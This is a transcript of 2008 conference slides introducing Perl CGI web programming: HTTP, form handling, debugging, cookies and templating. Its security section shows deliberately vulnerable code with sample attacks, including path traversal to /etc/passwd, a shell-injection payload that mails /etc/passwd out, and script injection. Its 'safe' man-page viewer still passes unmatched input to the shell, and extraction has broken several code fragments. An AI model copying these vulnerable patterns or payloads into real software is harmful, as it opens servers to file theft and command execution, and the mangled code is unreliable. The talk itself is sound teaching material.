introduction to web programming with perl
TRANSCRIPT
What is Perl
Introduction to Web Programming with Perl
Dave CrossMagnum Solutions [email protected]://mag-sol.com
What We Will Cover
The HTTP Protocol
The CGI Protocol
Creating Dynamic Pages with Perl
Getting Input from Forms
The CGI Module
What We Will Cover
Basic Web Security
Using Cookies
Using Templates
Further Information
HTTP
Network Protocols
A protocol is a defined way for objects to interact
Requests and responses are clearly defined
Client makes a request
Server responds
HTTP
Hypertext Transport Protocol
Client is (usually) a web browser
Server is a web server
Client makes a request for a URL
Server responds with appropriate data
HTTP Request
GET / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.4)
Gecko/2008111217 Fedora/3.0.4-1.fc9 Firefox/3.0.4
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
HTTP Response
HTTP/1.x 200 OK
Date: Wed, 26 Nov 2008 20:42:54 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 2172
Connection: close
Content-Type: text/html;charset=ISO-8859-1
...
Things to Note
Client requests a URL
Server works out what data is required
Response includes status code and data
Response defines type of data that follows
URLs
Universal Resource Locator
Defines a resource on the internet
http://example.com/some/path
Static URLs usually map on to a file on the web server
This mapping is defined by the web server
CGI
Beyond Static Pages
Static pages pages are limiting
Dynamic pages are more flexible
e.g. List of products
+ dynamic pages
= Online shop
CGI
Common Gateway Interface
Developed 1995
Defined howData gets into a program
Output from program returned to web server
Dynamic URLs
The web server needs to recognise CGI URLs
Two common methods
Locatione.g. cgi-bin directory
Naminge.g. .cgi extension
cgi-bin
Commonly defined as a place to put CGI programs
All requests to this directory are CGI programs
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
.cgi
Commonly defined as the extension for CGI programs
All requests to resources with this extension are CGI programsSays nothing about programming language
AddHandler cgi-script .cgi
Running CGI Programs
Web server checks incoming requests
If it is a CGI request (location or extension)Set up CGI environment
Call program
Return program output to browser
Perl and CGI
Perl and CGI
The early webmasters were also sysadmins
Most sysadmins used Perl a lot
Most CGI programs produce HTML
HTML is just a form of text
Perl is great for manipulating text
Many early CGI programs were written in Perl
Perl is Not CGI
Perl was used long before CGI programs were developed
Perl continues to be used in non-web areas
Other languages have also been used to write CGI programs
Some people still (incorrectly) assume that Perl and CGI are the same thing
Simple Perl CGI Program
#!/usr/bin/perl
print Content-type: text/plain\n\n;
print Hello world;
Simple Perl CGI Program
#!/usr/bin/perl
print Content-type: text/html\n\n;
print "/images/$a_pic"
);
Handling Input
Handling Input
So far all of our examples have only produced output
CGI programs are far more flexible if they can accept input
HTML Forms
CGI programs get their input from HTML forms
Text input, radio buttons, checkboxes, selectors
All seem very similar when they get to your CGI program
Sample HTML Form
Name:
Male
Female
Handling the Form
#!/usr/bin/perl
use CGI ':standard';
my $name = param('name');
my $sex = param('sex');
print header,
start_html(-title=>"Hello $name"),
h1("Hello $name"),
p("Hello $name, you are $sex"),
end_html;
CGI Parameters
The CGI module has function called 'param'
Returns the value of the parameters passed to the program
Pass it the name of the parameter you are interested in
The name is the name of the HTML form input
Listing Parameters
Without an argument, 'param' returns a list of all parameter names
my @params = param;
foreach my $param (@params) {
print p('Param ', b($param), ' is ',
i(param($param)));
}
Multivalued Parameters
Sometimes one name is associated with multiple values
The 'param' function handles this too
Checkboxes
Checkboxes allow you to choose several linked options
Drinks:
Beer
Wine
Coke
Three inputs with the same name
What will 'param' do?
Handling Checkboxes
Our previous form handler already copes with this
'param' returns a space-separated string
$drinks = param('drink');
You can also get a list
@drinks = param('drink');
print join ', ', @drinks;
Perl calls this context
GET vs POST
HTML forms can sent parameters to CGI programs in TWO ways
GET encodes the data in the URL
POST encodes the data in the request body
Define which method to use in the element
Default value is GET
GET
The default method is GET
Can be omitted
Data in URL
http://localhost/cgi/handle_form2?name=Dave&sex=Male&drink=beer&drink=wine&drink=coke
Easy to debug
Easy to hack
POST
POST needs to be set explicitly
Data transmitted in HTTP request body
Not seen in URL
Harder to debug
Harder to hack
Handling GET and POST
CGI.pm hides the difference from you
Both GET and POST parameters are accessed in the same way
'param' handles both methods
Easy to swap between the two
Mishandling CGI Data
CGI.pm has been a standard part of Perl for over ten years
No reason not to use 'param'
Some people still don't
Old code
Or code based on old code
Broken CGI Parser
if ($ENV{'REQUEST_METHOD'} eq 'GET') {
@pairs = split(/&/, $ENV{'QUERY_STRING'});
} elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {
read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
@pairs = split(/&/, $buffer);
}
foreach $pair (@pairs) {
my ($name, $val) = split /=/, $pair;
# some decoding skipped...
$form{$name} = $value;
}
You will see code like this
Do not use it
Simple CGI Summary
Simple CGI Summary
CGI defines a way to create dynamic web pages
Web server identifies CGI URLsBy location or name
Web server sets up CGI environment
Calls CGI program
Output returned to browser
CGI Input
CGI input comes from HTML forms
Input is either GET or POST
CGI program sees a series of name/value pairs
Debugging CGI
Debugging CGI
Things will go wrong when writing CGI programs
Here are some suggestions on tracking down problems
Debugging Perl
Same techniques as debugging any Perl program
Help Perl to help you
use strictMust declare variables
use warningsWarn about potential problems
Use both of these in all Perl programs
Check Syntax
Use perl -c to check for syntax errors
#!/usr/bin/perl
Print "hello\n";
$ perl -c print
String found where operator expected at print line 3, near "Print
"hello\n""
(Do you need to predeclare Print?)
syntax error at print line 3, near "Print "hello\n""
print had compilation errors.
Check Error Log
All web servers write an error logLocation depends on configuration
Generic error message to browserSecurity feature
Real error message in error log
Anything written to STDERR goes to error log
Writing to Error Log
#!/usr/bin/perl
use CGI 'header';
print header(
-type => 'text/plain'
);
print 'Nothing went wrong!';
# warn writes to STDERR
warn '(Actually something did)';
Errors to Browser
Sometimes it's useful to see real errors in the browser
CGI::Carp does this
use CGI::Carp 'fatalsToBrowser';
Still a security hole
Remove once debugging is overOr, at least, comment it out
Debugging HTTP
It's often useful to debug the HTTP exchange
See exactly what requests and responses are being exchanged
LWP (from CPAN) includes the GET, POST and HEAD programs
Debugging HTTP
#!/usr/bin/perl
use CGI 'header';
print header(
-type => 'text/plain',
-x_go_away => "It's a secret",
);
print 'See headers for more info';
Using HEAD
$ HEAD http://localhost/cgi/headers
200 OK
Connection: close
Date: Sat, 22 Nov 2008 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Type: text/plain; charset=ISO-8859-1
Client-Date: Sat, 22 Nov 2008 14:59:15 GMT
Client-Peer: 127.0.0.1:80
Client-Response-Num: 1
X-Go-Away: It's a secret
Live HTTP Headers
Live HTTP Headers is an add-on for Firefox
Allows you to watch the complete HTTP exchangeView
Save
Replay
Web Security
Web Security
Exposing a program on your web server is a brave thing to do
Anyone connected to the internet can run your program
Not everyone out there is nice
Need to be sure your program is secure
What Can Go Wrong?
You want a program to display files from your server
Accepts a file as a parameter
Send the contents of the file to the browser
Here's a first attempt
File Viewer Program
#!/usr/bin/perl
use CGI ':standard';
my $file = param('filename');
print header(-type => 'text/plain');
open FILE, $file
or die "Can't open $file: $!\n";
print while ;
What's Wrong With That?
You just compromised the security of your server
Your server contains many files that outsiders shouldn't see
e.g. /etc/passwd
Now anyone on the internet can see a list of usernames on your server
Forms Won't Save You
You could present a page that only allows people to choose certain filesPeople will look at the source of the form and hack the URL
You could change GET to POST to prevent URL-hackingPeople will create their own form and use that to send hacked parameters
Another Attempt
#!/usr/bin/perl
use CGI ':standard';
my $dir = '/usr/files/';
my $file = $dir . param('filename');
print header(-type => 'text/plain');
open FILE, $file
or die "Can't open $file: $!\n";
print while ;
Another Attempt
We have forced files to exist in a certain directory
Only files in that directory can be viewed
That's not true
We can use '..' to move up a directory
filename=../../etc/passwd
Still insecure
A Different Problem
We want to run a command on the server taking input from the user
For example, a manual page viewer
Takes a page name from user input
Manual Page Viewer
#!/usr/bin/perl
use CGI ':standard';
my $page = param('man');
print header(-type=>'text/plain');
print `man $page | col -b`;
What's Wrong With That?
Once again you've compromised security on your server
Problem is in this lineprint `man $page | col -b`;
Passing user input to an external program
Dangerous input
ls; mail [email protected] < /etc/passwd
Another Problem
Accept user input and write a results page using it
We've done this before
What if the input includes Javascript?
name=Dave
name=Davealert(Gotcha)
Javascript can be dangerous
Trust No-One
All of these problems have the same root cause
We trusted user input
Never trust your users
They are either malicious or stupid
Both options are dangerous to you
Check All Input
Check everything that comes into your program
Don't trust any piece of data
Especially if you're sending it out of your program
Use whitelists to define valid data
Throw out anything that doesn't match
Safe File Viewer
#!/usr/bin/perl
use CGI ':standard';
print header(-type => 'text/plain');
my $dir = '/usr/files/';
my $file = param('filename');
if ($file =~ /^(\w[\w\.]+)$/) {
$file = "$dir/$1";
} else {
print 'Go away!';
die "Bad filename: $file\n";
}
...
Is It Safe?
The safe file viewer assumes that all valid files are in one directory
Therefore the filename can only contain certain characters
/^(\w[\w\.]+)$/
Word characters and dots
No directory slashes
Anchors to match whole string
Safe Manual Viewer
#!/usr/bin/perl
use CGI ':standard';
my $page = param('man');
if ($page =~ /^(\w+)/) {
$page = $1;
}
print header(-type=>'text/plain');
print `man $page | col -b`;
Is It Safe?
Uses a similar approach to the safe file viewer
Unix commands consist of word characters
Use the word characters from the start of the input string
Ignore the rest
Safe HTML Input
#!/usr/bin/perl
use CGI ':standard';
my $name = param('name');
my $sex = param('sex');
$name =~ s/ Privacy -> Show cookies
You will probably have a lot of cookies
Sites use them to track visitors
Some people block them for that reason
Using Cookies
CGI.pm contains a cookie function
Used to both create and access cookie
Cookies need to be sent in the CGI header
Often the first thing to need to do
Setting a Cookie
my $cookie =cookie(
-name=>'time',
-value=>scalar localtime,
-expires=>'+1y'
);
print header(
-cookie => $time_cookie
);
print start_html(
-title=>'Cookie test'
);
print h1('Cookie test');
Getting a Cookie
if (my $time = cookie('time')) {
print p('You last visited this ',
page at $time");
} else {
print p('You haven't visited '
'this page before');
}
Cookie Confusion
People sometimes find cookie code confusing
There are often two completely separate cookies in a program
One incoming, one outgoing
The outgoing cookie is usually dealt with firstBecause it needs to be in the header
Login Example
Cookies can be used to track whether a user is logged in to a site
Write a cookie when the user logs in
Delete it when the user logs outActually just force it to expire
Log In With Cookies (1)
my $name;
my $logged;
if (param('login')) {
$logged = 1;
$name = param('name');
print header(
-cookie => cookie(
-name => 'name',
-value => $name,
-expires => '+1y',
)
);
}
Log In With Cookies (2)
elsif (param('logout')) {
$logged = 0;
$name = 'Guest';
print header(
-cookie => cookie(
-name=>'name',
-value=>'',
-expires=>'-1d',
)
);
}
Log In With Cookies (3)
else {
$logged = defined cookie('name');
$name = cookie('name') || 'Guest';
print header;
}
print start_html(-title => 'Cookies');
print h1('Cookies');
print p('This is a cookie test page');
$name =~ s/ 'logout',
-value => 'logout'));
} else {
print p('Enter your name: ',
textfield(-name => 'name'),
submit(-name => 'login',
-value => 'Set name'));
print end_form;
}
print end_html;
Cookie Security
Secure web apps don't reveal any more data than is necessary
Don't trust the browser
Don't store identifiable data in a cookie
Use a nondescript name
Store the real data on your server
Store a reference to data in cookie
Templates
Templates
So far all of our HTML has been stored in the program
Either hard-coded HTML or CGI.pm functions
This is fine for demos or simple programs
Can cause problems with larger projects
Separating Concerns
It's a good idea to separate business logic from display logic
Code that works out what to display
Code that works out how to display it
Advantages
Easier to change look of site
Easier to have consistent look and feel
Easier to split work between designers and programmers
Easier to produce alternative views of data
Simple Templating
See perlfaq4How can I expand variables in text strings?
Everyone writes a templating system
Most people release their templating system to CPAN
Please don't do that
Templating Systems
Many templating systems on CPAN
Text::Template
HTML::Template
HTML::Mason
Template Toolkit
Many more
I choose the Template Toolkit
Template Toolkit
Flexible templating system
Equally useful in web and non-web applications
Simple templating languageNot perl
Good Book Too
CGI Using Templates
Create an output template containing your HTML
CGI program acts largely as beforeProcesses inputs
Determines outputs
Passes outputs to template processor
Template Example
#!/usr/bin/perl
use CGI qw(param header);
use Template;
my $tt = Template->new;
my $name = param('name');
my $sex = param('sex');
my @drink = param('drink');
print header;
$tt->process('form.tt',
{ name => $name,
sex => $sex,
drink => \@drink })
or die $tt->error;
Template Example
Template Toolkit
Template Toolkit
Your name is [% name %]
Your sex is [% sex %]
You like to drink:
[% FOREACH d IN drink -%]- [% d %]
[% END %]
Simpler Templates
#!/usr/bin/perl
use CGI qw(param header);
use Template;
my $tt = Template->new;
print header;
$tt->process('form2.tt')
or die $tt->error;
Simpler Templates
[% USE CGI -%]
Template Toolkit
Template Toolkit
Your name is
[% CGI.param('name') %]
Your sex is
[% CGI.param('sex') %]
You like to drink:
[% FOREACH d IN CGI.param('drink') -%]- [% d %]
[% END %]
More Information
More Information
A really quick overview of web programming with Perl
Skimmed over a lot of detail
Some ideas for other things to investigate
Other sources of information
Things Missed Out
CGI.pmFar more functionality that we have covered
CGI environment functions
Sticky fields
Multi-page forms
More complex HTML generation
See perldoc CGI
Alternatives to CGI
CGI can be slow
Perl starts up for every page visit
Doesn't scale well
Alternatives approaches
mod_perl
Embeds a Perl interpreter in Apache
Much faster and more flexible
Storing Data
Most web applications will deal with a database
Storing and retrieving data
Standard Perl database interfaceDBI
More advanced database interfacesDBIx::Class
Web Frameworks
Web frameworks are very fashionable
Model (database)
View (templates)
Controller (logic)
MVC framework
e.g. Ruby on Rails
Perl Frameworks
Perl has MVC frameworks
Most popular is probably Catalyst
DBIx::Class + Template Toolkit
See Matt Trout's Tutorial after lunch
Sources of Information
Documentation for Perl modules at CPANhttp://search.cpan.org/
CGI.pmhttp://search.cpan.org/dist/CGI.pm
Template Toolkithttp://search.cpan.org/dist/Template-Toolkit
http://tt2.org/
Books
CGI Programming with PerlGuelich, Gundavaram, Birznieks
Writing CGI Applications with PerlMeltzer, Michalski
Official Guide to Programming with CGI.pmStein
That's All Folks
Thank you for listening
Any questions?
I'll be around all day
Feel free to email [email protected]
Click to edit the title text format
Click to edit the outline text formatSecond Outline LevelThird Outline LevelFourth Outline LevelFifth Outline LevelSixth Outline LevelSeventh Outline LevelEighth Outline LevelNinth Outline Level
London Perl Workshop29th November 2008